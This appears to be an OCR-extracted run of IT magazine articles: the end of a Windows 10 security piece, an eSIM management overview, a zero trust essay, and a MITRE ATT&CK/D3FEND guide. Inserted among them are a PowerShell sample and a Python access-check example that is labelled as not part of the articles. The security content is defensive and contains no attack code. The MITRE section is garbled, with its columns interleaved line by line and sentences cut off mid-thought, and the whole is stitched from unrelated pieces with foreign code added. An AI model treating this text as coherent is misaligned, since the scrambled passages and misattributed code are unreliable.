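    RequiredSecurityProperties           = @(1, 2)
    SecurityServicesConfigured           = @(1, 2)
    SecurityServicesRunning              = @(2)
    CodeIntegrityPolicyEnforcementStatus = 1
}
Get-VbsReport -DeviceGuard $sample | Format-List
# Live: Get-VbsReport | Format-List; Test-CredentialGuardPrerequisites
```

The distinction between ServicesConfigured and ServicesRunning is the one to watch in a rollout report: a machine that lists Credential Guard as configured but not running has the policy but not the protection, usually because a reboot is pending or a required property in MissingRequired is not available on that hardware.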

Defender Exploit Guard

Defender Exploit Guard (WDEG) [7] is provided by Microsoft starting with Windows version 1709. WDEG provides a set of host intrusion prevention features to reduce the attack surface of user applications. It is the successor to the Enhanced Mitigation Experience Toolkit (EMET), which Microsoft made available for free download for older versions of Windows (EMET reached the end of its support in 2018) to protect against exploits in applications with techniques such as data execution prevention (DEP), address space layout randomization (ASLR), structured exception handling overwrite protection (SEHOP), and others. WDEG can be configured in the Defender Security Center (Figure 3).

Defender Exploit Guard extends the security features provided with EMET to include Control Flow Guard, which provides protection against memory corruption exploits by restricting the targets to which an application may transfer control through indirect calls, and extends existing exploit prevention technologies. Exploit protection is one of four WDEG components; the others are attack surface reduction rules, network protection, and controlled folder access.

Figure 3: Defender Exploit Guard is configured in the Defender Security Center.

Defender SmartScreen

SmartScreen has been part of the operating system on clients and servers for several Windows versions and was renamed Microsoft Defender SmartScreen [8] in Windows 10. The tool helps prevent access to websites that have been reported as phishing or malware spreaders and blocks the download of potentially dangerous files. Defender SmartScreen determines whether a web page is potentially dangerous as follows:
• Analyzes web pages visited and searches for indications of suspicious behavior. If this is the case, SmartScreen displays a warning page and advises caution.
• Compares web pages visited with a dynamic list of reported phishing and malware portals. In case of a match, SmartScreen also displays a warning that the website may be malicious.
SmartScreen tries to determine whether a downloaded app or app installer might be dangerous in the following ways:
• Compares downloaded files with a list of reported websites and programs known to be unsafe. In case of a match, SmartScreen displays a warning to that effect.
• Compares downloaded files with a list of known files downloaded by many Windows users. If the file does not appear in this list, SmartScreen displays a warning and advises caution.
SmartScreen is configured by Active Directory group policies or a mobile device management tool such as Microsoft Intune.

Recommendations for Windows 10

The majority of successful attacks on systems with Windows 10 can already be detected or prevented with the on-board tools available in the operating system. To make it easier to configure the operating system appropriately, the German Federal Office for Information Security (BSI) recently published recommended actions for securing Windows systems: SiSyPHuS Win10: Study on System Integrity, Logging, Hardening, and Security-Relevant Functionality in Windows 10 [9]. One focus in creating this was on ease of implementation and practical application. For this reason, the BSI makes the recommended configuration settings available for download as group policy objects that can be imported directly.

In the security analysis, the BSI examines the security-critical functions of the operating system. The goal is to be able to evaluate the security and residual risks for using Windows 10, to identify framework conditions for secure use of the operating system, and to create practically applicable advice for hardening and secure use. The recommendations from SiSyPHuS are primarily aimed at federal and state authorities, as well as companies. However, technically savvy citizens can also implement the listed points, depending on the Windows 10 version they are using.

The recommendations, Group Policy objects (GPOs), and other partial results of the study that have already been published are available on the BSI website [9]. The BSI intends to publish further conclusions from other parts of the study successively. The analyses include components such as PowerShell, the application compatibility infrastructure, driver management, and PatchGuard. The subject of the study was Windows 10 Enterprise LTSC 2019, 64-bit, German-language version.

Conclusions

Microsoft has made an effort in Windows 10 to expand the list of new security features in addition to those already built-in and, as a result, has achieved a better level of protection than in older operating system versions. The semiannual updates and the ever-increasing integration with Azure Cloud make Windows 10 one of the most secure operating systems on the market. Unfortunately, many features require the use of the Enterprise version and cloud integration.

Info

[1] Windows Update for Business: https://docs.microsoft.com/en-us/windows/deployment/update/waas-manage-updates-wufb
[2] Windows Hello: https://support.microsoft.com/en-us/windows/learn-about-windows-hello-and-set-it-up-dae28983-8242-bb2a-d3d1-87c9d265a5f0
[3] Defender Security Center: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-security-center/windows-defender-security-center
[4] Defender for Endpoint: https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint?view=o365-worldwide
[5] Defender Application Control: https://docs.microsoft.com/en-us/windows/security/threat-protection/device-guard/introduction-to-device-guard-virtualization-based-security-and-windows-defender-application-control
[6] Defender Credential Guard: https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard
[7] Defender Exploit Guard: https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/enable-exploit-protection?view=o365-worldwide
[8] Defender SmartScreen: https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-smartscreen/microsoft-defender-smartscreen-overview
[9] BSI: SiSyPHuS project (in English): https://www.bsi.bund.de/EN/Topics/Cyber-Security/Recommendations/SiSyPHuS_Win10/SiSyPHuS_node.html

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 77
MANAGEMENT: eSIMs

eSIMs in the enterprise

Card Change

In this overview, we look at the opportunities eSIM technology offers for the mobile workplace and what IT managers need to watch out for in deployment and management. By Marco Föllmer

Photo by Glen Carrie on Unsplash

The COVID-19 crisis and 2020 have changed the world of work. In response to the virus, many companies introduced long-term home office work models for their teams for the first time. Today, it is clear that the legacy 9-to-5 working model in the office is a thing of the past for many. Even when new people join the company, their first day at work often no longer takes place on the company premises but at home. Employees need to be able to put their devices into operation as easily as possible while complying with corporate security standards.

Devices need to be directly subordinate to a unified endpoint management (UEM) system to ensure that they are configured in line with corporate policies. IT support can’t supervise employees while they are at home and would be happy to field as few requests for help as possible. The same applies when a device needs to be replaced. The exchange needs to take place with as little overhead as possible for both users and IT.

Technologies for remote commissioning of devices already exist, and corporations could do worse than deploy them in line with requirements. One such technology is the eSIM, which offers employees, companies, and their IT administration teams the opportunity to simplify mobile work.

eSIM-Enabled Devices on the Rise

The embedded SIM is a chip built into the mobile device that stores one or more profiles belonging to network operators. For this purpose, each eSIM has an eID: a unique number used to authenticate the user on the mobile network. eSIM technology replaces physical SIMs in mini, micro, or nano format and offers many advantages for users. The eSIM looks completely different from a physical SIM and solves some of its challenges, as well.

eSIM technology was first used in a smartwatch by manufacturer Samsung in 2016. In the following years, its use was enabled in smartwatches by other manufacturers, as well. In 2018, the eSIM then gained further popularity when Google and Apple brought it to their smartphones. Today, increasing numbers of smartphones, tablets, and smartwatches can use an eSIM, and the numbers continue to increase. According to a study by Juniper Research, global usage is expected to rise from 1.3 billion in 2021 to 3.4 billion in 2025 [1]. In the long term, it’s possible that these rising numbers could lead to the elimination of the slot for physical SIMs in mobile devices and to eSIMs becoming the sole standard. eSIM technology is already being used successfully outside of mobile communications (e.g., in the IoT and connected car sectors).

Fast Commissioning on the User Side

One advantage of the eSIM lies in simplified operations. A physical SIM first has to be handed over to the employee, either in person or by surface mail. Once received, it has to
be broken out of the packaging and inserted into the device. With the eSIM, these two steps are eliminated, and errors, misuse, and long shipping routes can be avoided.

Employees can enable eSIM profiles regardless of their time zone and location by scanning a QR code. All they need is an Internet connection. In this way, employees can be ready to start work within a few minutes without any intervention on the part of IT support. This advantage saves time and resources for both sides, especially in times of hybrid work models and decentralized IT structures.

Parallel Use of Plans

For employees who travel on business, the IT department can issue an eSIM with a plan for the appropriate country at short notice. The eSIM also often supplements a physical SIM card. For example, a business and a private plan can be used in parallel on the same device. In many cases, this would not be possible without the eSIM because not every device offers the option of inserting two physical SIM cards in one device.

Likewise, the use of multiple business plans is no longer a problem. Depending on the device, up to 10 eSIM profiles can be stored and selected in parallel, which is a major advantage in terms of costs, as well, for companies that have opted for Bring Your Own Device (BYOD) or for private use of business devices (corporate-owned, personally enabled; COPE). Employees also benefit because they don’t have to carry two devices for personal and business use.

Benefits in Mobile Security

Compared with the physical SIM, the eSIM boosts security when working on the move. eSIMs come with various security measures implemented by default. The eSIM profile installation on a new device is encrypted to prevent data leaks. The same applies with end-to-end transmission between the eSIM provider’s servers and the end device. Additional security is offered by a feature that only allows an eSIM profile to be decrypted and installed on a device assigned to the user.

The absence of a physical SIM card also reduces the risk of misuse because the eSIM cannot be slotted into another (possibly private) device. If a device does happen to be stolen or lost, IT support can quickly deactivate the eSIM remotely and delete the data from the device within the UEM system.

Wary of Change

All told, the eSIM offers many advantages over the physical SIM, and its use in smartphones in Germany is on the rise, mainly in the private sector, whereas German corporations still mainly use physical SIMs. Organizations with a large number of employees and complex structures in particular are worried that switching from a physical card to an eSIM could mean massive overhead in terms of time, resources, and manual work to set up the new system. After all, administrators need to configure various data (e.g., the eID, email address, and device model: information that can usually be viewed on the UEM system in use) to enable an eSIM profile, but the data first has to be retrieved from various sources.

Additional data such as the telephone number, the selected rate plan, or details of the existing card, such as the ICC (the SIM serial number), can usually be found in the provider’s customer portal or even stored individually in Excel lists.

The changeover can therefore require many manual steps on the part of the corporation if the data cannot be merged automatically. These steps apply not only when switching from the physical SIM card to the eSIM but also if a device needs to be replaced later, is lost or stolen, or a non-domestic plan is required.

Simplified Management

New software (e.g., the eSIM Business Manager, which EBF developed in cooperation with Deutsche Telekom [2]) can help in these scenarios. In conjunction with a UEM system, an eSIM manager makes it possible to link the required data from various sources and make the data clearly visible and usable in a portal. Using such portals, administrators can assign an eSIM to a device and remotely enable the eSIM (and also revoke it again if necessary) in a quick and easy way. The software therefore enables both the commissioning of a new eSIM profile and the migration of a physical SIM to an eSIM profile with just a few clicks.

The process is equally convenient on the user’s side: Employees can define when they want to migrate to suit their needs and complete the move with just a few clicks. The plan can then be used directly. The software not only helps manage eSIMs in companies but also facilitates parallel management of physical SIM cards, because the portal also displays the details you need to manage physical cards, such as the PIN and PUK.

Conclusions

Corporations, administrators, and IT decision makers need to start looking at eSIM technology today. After all, it offers a huge amount of potential for today’s, and tomorrow’s, world of work. Employees want and need to work more flexibly: from their home offices, from a hotel room on business trips, or onsite with customers. eSIM technology supports this style of work by offering flexibility and convenience and saving administrative overhead and costs.

Info
[1] eSIM device installations: [https://www.juniperresearch.com/press/esim-device-installations-to-reach-3-4-billion]
[2] eSIM Business Manager: [https://ebf.com/en/esim-business-manager-taking-endpoint-enrollment-to-the-next-level/]

Author
Marco Föllmer is a managing partner and founder of EBF GmbH.
MANAGEMENT: Zero Trust

Zero Trust as a security strategy

Beyond the Patch

Acceptance of zero trust models like BeyondCorp by Google or LISA by Netflix lags in Europe, where endpoint security is king. We examine why this situation must change by looking into the principles of modern zero trust concepts. By Martin Loschwitz

Photo by Jack Dong on Unsplash

Even if you don’t want to hear it, European IT is not necessarily known for being hyper-innovative – for a variety of reasons. Successful startups, for example, are far less likely to be launched in Europe than in the US, and not because no bright minds with smart ideas are on the east side of the Atlantic, but because of the structures of the industry as such. The much-quoted bon mot “we’ve always done things this way” contains more than a shred of truth. Anyone who has ever experienced a European IT company from the inside will know what I mean when I say that the impression is more of an archeological excavation site than a technology company.

Wrapped up in this dilemma is enterprise devotion to endpoint security in a local network, which encounters problems when administering clients outside that network and necessarily feeds the VPN revenue stream. However, rebuilding your infrastructure to implement a zero trust concept will pay off in the long run with less complexity and higher effectiveness, especially for employees outside the local network, which in today’s environment, can easily be the majority of a work force.

Standards from the Last Century

One area in which this can be seen more clearly than in almost any other is security. Partners from the US or Israel who regularly work with large German corporations (my milieu) are amazed at the standards of security and compliance that are still commonplace in this country.

Stating that access to your own email on a smartphone is supposed to be linked to a mobile VPN “because of security” often leads to bewilderment among observers. Likewise, that many large European corporations still force employees to change their passwords on a regular basis raises an eyebrow among others. This confusion is understandable, because it has long been shown that users simply change their existing password by just one character if worst comes to worst.

Supposedly progressive companies have started the next round in the fight against such passwords and check the password against a dictionary or for certain character strings. For example, although “2021” is not allowed in a password and the password manager will protest, it will still accept “2o21” as an entry without any complaints. External observers will start looking for the candid camera when they see all these security measures from the last millennium and realize that two-factor authentication is not mandatory.

We Have Always Done It This Way

Many security and compliance measures in today’s companies are more apparent than real, and this phenomenon can be seen, for example, in the idea of the “secure local network,” which continues to be used unwaveringly by many corporations
up and down the continent – even if the representative of an insurance company at the customer’s location cannot issue a contract because the software that communicates with the central systems in the enterprise cannot establish a VPN connection. VPN connections don’t need thick wires, but they do need reliable ones. You can’t win a pot of gold with a connection hampered by a poor enhanced data GSM environment (EDGE) or because of a completely overloaded 4G network.

Nevertheless, many companies are forcing their employees to use these and other technical measures of dubious benefit. As if things weren’t bad enough, some managers are not afraid to cite data protection blatantly as the cause of the malaise. In the given context, it is not uncommon to hear that the European Union General Data Protection Regulation (GDPR) is to blame because it mandates secure communication in line with “state-of-the-art principles” and “especially because of COVID.” Even before COVID and long before the GDPR, it was simply ignored if 2,500 colleagues had to make their way through the same, way too narrow VPN gateway. The nonsense that is sometimes heard in the corporate security context would often be euphemistically described as “discouraging.”

Endpoint as the Central Building Block

While reading this article, you might be wondering what the rant about large corporations and their sometimes absurd security theater has to do with endpoint security. The answer to this question may be somewhat surprising to some, because it is very relevant. Consistently and correctly implemented security on end devices is a huge building block on the way to a modern security architecture in your company.

However, for endpoint security to work effectively, it needs various other factors. Anyone who considers endpoint security to be the only factor in the fight against attackers and follows the maxim that only the most secure client possible is the last word of wisdom is fatally mistaken. To explain this in more detail, however, I need to briefly digress into the subject of secure networks and explain why this concept has long since become obsolete.

The Secure Network Principle

Admittedly, in many companies, the idea of a secure local network dates back to a time when the threat scenario in IT was completely different from the current scenario. Moreover, anyone who had to plan security for a company at the end of the 1990s did not have even a fraction of the tools available to admins today. Accordingly, most companies took a crude approach: The IT department simply divided the world into good and evil, or, as it was usually implemented, into “them” (evil hackers) and “us” (corporate users).

The people in charge followed through with this segregation with total consistency at all levels of the company’s IT. Most admins still encounter this basic idea in the data center today (e.g., when there is an internal zone containing the most important systems that do not have a direct connection to the Internet). Also in the mix is the demilitarized zone (DMZ), to which access from outside is meticulously regulated by firewalls (Figure 1). The third network segment, the Internet, is evil, ugh, and to be avoided to the greatest extent possible. Larger enterprises and deployments have further refined this principle by segmenting their networks even further.

In this case, the servers with the particularly important data are not located in the internal zone but in a “very internal” zone, which in turn is separated from what is already an internal zone by a DMZ with an integrated firewall. The division into segments has one flaw: Once you are on the “local network” with a client, you are given access to the other components of the setup, even if your intentions are dishonest. In environments of this type, a client gets access to infrastructure simply because it is in a certain physical or logical location.

What may not sound so dangerous at the data center becomes a real problem in the context of clients. Because the principle of a secure local network is so tempting at first glance, many companies have quickly applied it to their client landscapes, too. They are actively supported by many service providers who generate horrendous revenues with VPN solutions (Figure 2). The result is that some of a company’s services can no longer be used in any meaningful way because they are practically inaccessible. If the company’s own service laptop breaks down, an employee is practically unable to work until they are issued replacement hardware that is allowed to talk to the VPN.

Why the Secure Network Principle Fails

The big problem with the secure network idea is that it is patently false and didn’t work well even years and

Figure 1: DMZ strategies are one of the oldest implementations of the secure local area network principle, but in today’s IT, this approach has had its day.
decades ago. The idea that a client of any kind is trustworthy simply because it has access to a certain network segment is nonsense. The rule implicitly assumes that the users who use the respective clients know what they are doing and can handle the privileges they have been granted. The opposite is the case, as various examples from the past prove.

The stories in which security researchers succeeded in gaining access to employees’ systems with floppy disks labeled “porn” left in company restrooms are the stuff of legend – because the floppies naturally contained viruses. In this case, the entire security strategy is doomed, because once an attacker has access to a system inside the setup, most security precautions no longer work.

Other examples of the nonsensical nature of the secure network approach are the countless cases of hacked Docker containers and OS images that are now roaming the net. Admittedly, from the user’s point of view, it is tedious to build your own OS image from the providers’ sources. The temptation to organize a ready-made image off the web is great, even if the image might be of dubious provenance. Admins struggle with the results of such thoughtlessness every day. If the ready-made image contains not only what it says on the box but also a virus or a cryptocurrency miner that generates traffic without end, security has already gone to pot.

To aggravate things, modern IT is extremely complex – companies that deal with IT forensics consequently make a lot of money, and for good reason. After all, in a software-defined environment, tracing the paths attackers have taken after illegally accessing a network element is difficult and often even impossible. Entire government agencies, hospitals, and companies go offline for days and weeks after such problems, until the network is patched back together with some degree of difficulty.

Security Until IT Shutdown

Companies with legacy security strategies are usually aware of their shortcomings, and the most abominable workarounds tend to sprout up: Mail servers are hidden in even deeper internal network segments, or complex firewall constructs are created that have to be extended by rules with hyper-complex processes. At the end of the madness is one big something that the admins of a company often can no longer keep track of in its entirety, partly because it is unclear which security measures take effect where and when. The usability of a company’s IT services falls victim to the quest for the greatest possible and most complete security.

Administrators then come to the bitter realization that a client being located in a certain place (or not) cannot be a valid indicator for or against protective measures. Tools that propagate this approach (e.g., VPN-based products) are a relic of the past, propagating dubious security strategies and limiting the usability of services but offering few effective benefits.

Once this incontrovertible fact has seeped in, it sharpens the eye for real opportunities. Once again, industry leader Google has shown how this can look. At Google, the idea of the secure network became obsolete years ago. Instead, the company is pursuing a strategy known as BeyondCorp [1]. The core aspect of this strategy is that the focus is no longer on the individual

Figure 2: VPN networks also propagate the principle of the secure local network but fail to acknowledge the complex attack scenarios of today.

Figure 3: In BeyondCorp environments, clients are granted access only if they can identify themselves as authorized on the basis of multiple factors. Here, the app is asking if I am trying to log in and whether I have tried logging in near Berlin, Germany, on my Intel Mac OS X 10.15 device.
client, but on its applications and the way they communicate with the existing infrastructure.

BeyondCorp

I want to take the wind out of the sails of an argument often raised against the BeyondCorp principle right from the start: Google’s solution does not mean that admins completely dispense with security precautions. Quite the opposite: The servers that Google operates for services like Gmail or Google Drive are subject to explicit, very strict, and tightly meshed rules. The point is far more that Google does not differentiate between “internal” and “external” connections for its own services. Instead, every client is basically considered untrustworthy.

Therefore, an individual client does not automatically receive more rights than others simply because it has a certain network address or is located at a certain physical location (Figure 3). Rather, any employee can access their resources from any client in the world at any time, as long as the client with which this happens adheres to a few rules that make it trustworthy, and it is those rules that make up the BeyondCorp principle.

Incidentally, Google’s approach has inspired a number of other tech giants. Netflix also says that it now uses a zero trust architecture (i.e., a system in which the provider’s services do not trust a client at all, regardless of where it is). Netflix calls the principle location-independent security approach (LISA) and has admittedly invented a far nicer name than Google. BeyondCorp, LISA, and most zero trust approaches use the same basic principles; therefore, in the further course of this article, I will no longer distinguish between the implementations.

What BeyondCorp Is All About

BeyondCorp’s central approach is to approve access to any service only if it meets several requirements. It must always be authenticated; that is, the requesting client must have proven that it is authorized for the requested resource. High standards apply. Additionally, access must be authorized. A central rights management system must therefore specify that the client is allowed access to the resource it is currently trying to access.

Encryption of the connection is mandatory, not optional. At least this point is taken for granted from today’s perspective; however, if you go back 10 years, you could still find some web stores that did not have SSL certificates to process orders securely. Google’s BeyondCorp concept would not, of course, allow connections without encryption, because
that would mean that any bad guy with access to the line between client and server – often several thousand kilometers in length – could read the data traffic. For a client to be trusted from the service’s point of view, it has to be able to use encrypted connections.

However, the requirements for the client and its user are not yet complete. In the context of a BeyondCorp procedure, a user is only granted access to a resource if it is possible to establish a direct connection between them, their environment, and the technical client. What is stated in the BeyondCorp guidelines in somewhat cryptic terms generally means two-factor authentication (2FA) in everyday life.

In this way, Google consequently eliminates the eternal password problem: If 2FA is activated for access, it is initially irrelevant if a user’s username and password fall into the hands of attackers. For them to log in and access the client’s data, they need the second factor – usually a smartphone – with a suitable app that can be used to grant approval for the respective access. Authentication with an SMS text code has rightly fallen into disrepute today, and applications such as Google’s Authenticator offer better alternatives.

For its own services, Google now goes so far as to display a warning in the respective apps (e.g., Gmail) if the same account logs in on another device. If the user does not confirm this access on their own smartphone, Google rejects it. As a rule, smartphones are also secured against access by strangers – for example, by an unlock pattern or facial recognition, which is practically a third factor. Even if the bad guys were to get their hands on the smartphone in addition to the combination of username and password, they would still not be able to do anything with the stolen device.

Strict Regime for Clients

A large portion of endpoint security products only begin to make some form of sense in the context of BeyondCorp. After all, only if a service can make decisions about allowing or denying the connection on the basis of various properties and parameters of the endpoint in question does the admin gain genuine control over the individual clients, which admittedly requires a bit more than just properly configured services.

For good reason, mobile device management is a fixed component of all LISA and BeyondCorp environments. If a smartphone is lost, the respective owner (e.g., the company) can remotely delete the device and render it unusable, making BYOD scenarios possible: Anyone who wants to use their own iPad can do so if they place the device under the auspices of the relevant compliance and security team. As a rule, this condition does not restrict the functions, but the user does relinquish some of their sovereignty over the device.

Zero Trust – No Alternatives

Anyone who has ever struggled as I have with the sometimes unusable infrastructure services of German corporate IT will sooner or later come to the conclusion that BeyondCorp is an absolute must-have. Many companies shy away from this realization because it requires a huge rebuild of their own infrastructure. For this reason, it is not possible to share tips or advice here with regard to individual components.

Anyone who gets around to implementing a zero trust concept for their own company usually starts on a green field and redesigns their IT application landscape, leading to unease and costly outlays. Google itself, however, proves with statistics from its own business that BeyondCorp does pay off in the long run. Higher employee effectiveness, a less complex infrastructure to maintain, and fewer sprawling processes in the company are just a few of the benefits that ultimately show up in the bottom line.

Of course, Google wouldn’t be Google if the company hadn’t long ago bundled BeyondCorp into a boxed product that is available for a price. The provider even offers migration consultancy to interested customers. Google has long since ceased to be the only player on the market. If you do not want to commit to Google’s services, and they do play a major role in BeyondCorp, you will find similar approaches and complete packages on offer from other providers. Additionally, a market of consulting companies now exists that can implement similar concepts with on-premises components in the customer’s data center.

Conclusions

Endpoint security can only work if the device that the user relies on is part of a tight network of security functions. From today’s perspective, it is grossly negligent simply to assume no danger from a client on the VPN. Anyone who has had to deal with procedures of this type from an admin point of view will be aware that it can make daily operations extremely tiresome.

Truly, most companies in Europe are still fighting against the realization that the principle of the secure network has had its day. However, this strategy is not sustainable. The principle of “better late than never” applies here. If you decide to implement a comparable strategy today, you have the option, or at least a perspective, of getting away from the IT of the past. However, if you continue to resist, you can expect to be faced with an increasingly difficult-to-maintain and convoluted infrastructure.

Info
[1] BeyondCorp: [https://cloud.google.com/beyondcorp]

The Author
Freelance journalist Martin Gerhard Loschwitz focuses primarily on topics such as OpenStack, Kubernetes, and Ceph.
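The access rules this article attributes to BeyondCorp, carried through as an added example (not Google's code and not part of the article): a request is approved only when authentication with a strong second factor, authorization from a central rights store, a managed and compliant device, and an encrypted connection all hold, and the legacy "secure local network" rule is shown beside it for contrast. The rights store, device inventory, user names and addresses are constructed sample data.

```python
"""Access decision in the style the article describes: a request is approved
only if the user is authenticated with a second factor, a central rights
store authorizes the user for the resource, the device is under management
and the connection is encrypted. Network location is not a criterion."""
from dataclasses import dataclass, field
from ipaddress import ip_address, ip_network

# Second factors accepted here; SMS codes are left out on purpose.
STRONG_SECOND_FACTORS = {"totp", "push_approval", "hardware_key"}

# Constructed sample data standing in for the central rights management
# system and the mobile device management (MDM) inventory.
RIGHTS = {"alice": {"mail", "wiki"}, "bob": {"wiki"}}
MANAGED_DEVICES = {"laptop-0042": {"compliant": True},
                   "ipad-0007": {"compliant": False}}   # out of policy

INTERNAL_NET = ip_network("10.0.0.0/8")   # the "secure local network"


@dataclass(frozen=True)
class AccessRequest:
    user: str
    resource: str
    factors: frozenset        # proofs presented, e.g. {"password", "totp"}
    tls: bool                 # connection is encrypted end to end
    device_id: str            # as reported by the MDM agent
    source_ip: str            # logged for audit, irrelevant to zero trust


@dataclass
class Decision:
    allowed: bool
    reasons: list = field(default_factory=list)


def zero_trust_decide(req: AccessRequest) -> Decision:
    """Every requirement is checked on every request; all of them must hold."""
    reasons = []
    if not req.tls:
        reasons.append("connection is not encrypted")
    if "password" not in req.factors:
        reasons.append("user is not authenticated")
    if not (req.factors & STRONG_SECOND_FACTORS):
        reasons.append("no acceptable second factor presented")
    if req.resource not in RIGHTS.get(req.user, set()):
        reasons.append(f"{req.user} is not authorized for {req.resource}")
    device = MANAGED_DEVICES.get(req.device_id)
    if device is None:
        reasons.append("device is not enrolled in MDM")
    elif not device["compliant"]:
        reasons.append("device is out of compliance")
    return Decision(allowed=not reasons, reasons=reasons)


def perimeter_decide(req: AccessRequest) -> Decision:
    """The legacy rule the article criticizes: inside the LAN or VPN range
    means trusted, no matter who the user is or what state the device is in."""
    if ip_address(req.source_ip) in INTERNAL_NET:
        return Decision(True)
    return Decision(False, ["client is outside the local network"])


# Constructed requests: one from the office LAN with weak proofs, one from a
# hotel network with every requirement met.
LAN_WEAK = AccessRequest("bob", "mail", frozenset({"password"}), True,
                         "unknown-device", "10.1.2.3")
REMOTE_STRONG = AccessRequest("alice", "mail",
                              frozenset({"password", "push_approval"}), True,
                              "laptop-0042", "203.0.113.7")

if __name__ == "__main__":
    for name, req in (("LAN_WEAK", LAN_WEAK), ("REMOTE_STRONG", REMOTE_STRONG)):
        print(name, "perimeter:", perimeter_decide(req).allowed,
              "zero trust:", zero_trust_decide(req))
```

The LAN request passes the perimeter check and fails zero trust on three counts; the remote request is the other way round, which is exactly the point the article makes about location as a trust signal.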

NUTS AND BOLTS: MITRE ATT&CK & D3FEND

Attack and defense techniques

Cybersecurity Know-How

The MITRE ATT&CK and D3FEND knowledge databases provide useful techniques for securing your IT infrastructure. By Matthias Wübbeling

Photo by Artem Bryzgalov on Unsplash

IT security affects many different areas of a company. Trying to identify possible attack vectors for each area in advance and protect the IT infrastructure with effective countermeasures can be a Sisyphean task, especially for companies without a Security Operation Center (SOC). When it comes to implementing security measures, knowledge and experience are important.

MITRE, a nonprofit organization that operates various research facilities on behalf of the U.S. government, provides comprehensive information on IT security. MITRE developed the CVE system, for identifying and assigning unique identifiers to vulnerabilities, and also developed STIX and CyBox, which are used to exchange threat information and attack indicators.

The MITRE ATT&CK and D3FEND knowledge databases offer techniques that let you retrace an attacker’s steps, as well as prevent attacks in the first place. Here’s how to use these techniques to secure your enterprise IT.

ATT&CK

Released to the public in 2015, MITRE’s ATT&CK framework provides a knowledge database of attack techniques and methods enriched with details about hacker groups and their individual procedures. For an initial overview of the knowledge base, visit the ATT&CK website [1] and Matrices in the top menubar. In the sidebar on the left, the ATT&CK dataset is broken down by Enterprise (enterprise IT), Mobile (smartphones), and ICS (industrial control systems). Both Enterprise and Mobile are directly integrated into the interface, while ICS currently still links to a wiki with more information.

The matrices, sorted chronologically, are based on Lockheed Martin’s Cyber Kill Chain [2]. For the
Enterprise Matrix, you’ll find preparatory techniques in the Reconnaissance phase on the left. On the far right, you’ll find an attacker’s potential activities after successfully hijacking a system under the Exfiltration and Impact phases.

In order to take a closer look at individual techniques, I will focus on the Phishing for Information [3] technique listed under the Reconnaissance phase. If you click on Phishing for Information, you will be taken to a detailed page with further information. There, you will learn how attackers send phishing messages to potential victims in order to obtain more information from companies, such as login data for computer systems. Keep in mind that this technique differs from the Phishing technique listed under the Initial Access phase, where the

from the defender’s point of view. The D3FEND matrix has five different techniques for securing your computer systems. On the left side of the matrix, Harden lists four technique categories for securing systems and resources before using them. You’ll find methods for compiling software, securing passwords, and encrypting messages, as well as how to use TPM-based boot protection or hard disk encryption.

The Detect category offers techniques that can be used to detect malicious activities or to evaluate general activities on your network. Staying with the phishing example, clicking on Sender MTA Reputation Analysis (located under the Message Analysis subcategory) takes you to a page with techniques for evaluating message transfer agents (MTAs). For instance, you can de-

your progress in securing the infrastructure. This helps you delegate individual tasks within your team and include quick overviews of the status quo in your reports.

Conclusions

MITRE ATT&CK and D3FEND knowledge bases provide you with comprehensive insights into cybersecurity techniques. You can use these databases as a foundation for securing your enterprise IT infrastructure or simply as a reference for the next capture-the-flag event. If you find something missing in the knowledge databases, you can contribute content for future versions. In this way, expert knowledge can be bundled and made available to as many companies as possible.
objective is to send executable code termine a trust rating for the sender
(malware) as part of a phishing MTA based on past behavior, such Info
campaign. as receiving prior emails from an [1] ATT&CK: [https://attack.mitre.org]
In the Procedure Examples section, MTA, the domains used as sender [2] Lockheed Martin Cyber Kill Chain:
you’ll find examples of groups that domains, or the number of reply [https://www.lockheedmartin.com/en-us/
have used such techniques in the emails from an MTA. capabilities/cyber/cyber-kill-chain.html/]
past, often with brief comments. Each technique entry in the [3] Phishing for Information technique:
The Mitigations section lists two D3FEND database contains direct [https://attack.mitre.org/techniques/
potential countermeasures: Software links to the relevant ATT&CK tech- T1598/]
Configuration and User Training. niques, as well information about [4] “Hardening Network Systems with
The Software Configuration counter- implementations or patents that DNS” by Matthias Wubbeling, AD-
measure references SPF, DKIM, and cover corresponding techniques. In MIN, issue 66, 2021, [https://www.
DMARC (see also [4] and the “Trust- this way, you can jump back and admin-magazine.com/Archive/2021/66/
worthy” article in this issue) in order forth from one MITRE database Hardening-network-services-with-DNS]
to limit the success of legacy email to another to quickly determine [5] D3FEND: [https://d3fend.mitre.org]
phishing. The User Training counter- whether you thought of everything [6] ATT&CK STIX data: [https://github.com/
measure relies on training employees during hardening. The D3FEND mitre-attack/attack-stix-data/]
to detect and thwart phishing at- knowledge base is a logical comple-
tempts. The Detection section pri- ment to the ATT&CK database. The Author
marily describes automated options Dr. Matthias Wübbeling is an IT security en-
for detecting the technology, which thusiast, scientist, author, consultant, and
you can use for protection and also Systematic Use speaker. As a Lecturer at the University of
for creating situation reports. The For a deeper insights, or to col- Bonn in Germany and Researcher at Fraunhofer
Reference section contains sources lect and process information in a FKIE, he works on projects in network security,
and further information, including targeted way, ATT&CK offers ad- IT security awareness, and protection against
scientific papers, reports, and articles ditional connections. For example, account takeover and identity theft. He is the
for further research. if you already use a tool for ana- CEO of the university spin-off Identeco, which
lyzing STIX data, you can import keeps a leaked identity database to protect
D3FEND STIX datasets prepared by MITRE employee and customer accounts against iden-
directly from the repository [6]. tity fraud. As a practitioner, he supports the
Analogous to the attack techniques The ATT&CK navigator can be used German Informatics Society (GI), administrat-
specified in the ATT&CK framework, to mark relevant entries during re- ing computer systems and service back ends.
the MITRE D3FEND [5] knowledge search and to display correlations, He has published more than 100 articles on IT
base provides you with information thus letting you plan and trace security and administration.

NUTS AND BOLTS  Optimizing X Window Displays

Configuring X Window input and output devices

Tailor-Made

Two command-line tools, xrandr and xinput, let you optimize your X Window display from the terminal. By Thorsten Scherf

An X Window System provides several components to allow users to interact with a graphical interface. An X server lets applications, also known as X clients, use a graphical display within windows. The window manager determines the look and feel of such an interface, as well as takes care of how the windows are handled (e.g., enlarging, reducing, or closing them). A desktop manager, which is ultimately responsible for bringing order to this kind of graphical interface, displays icons, menus, panels, and other elements on the desktop.

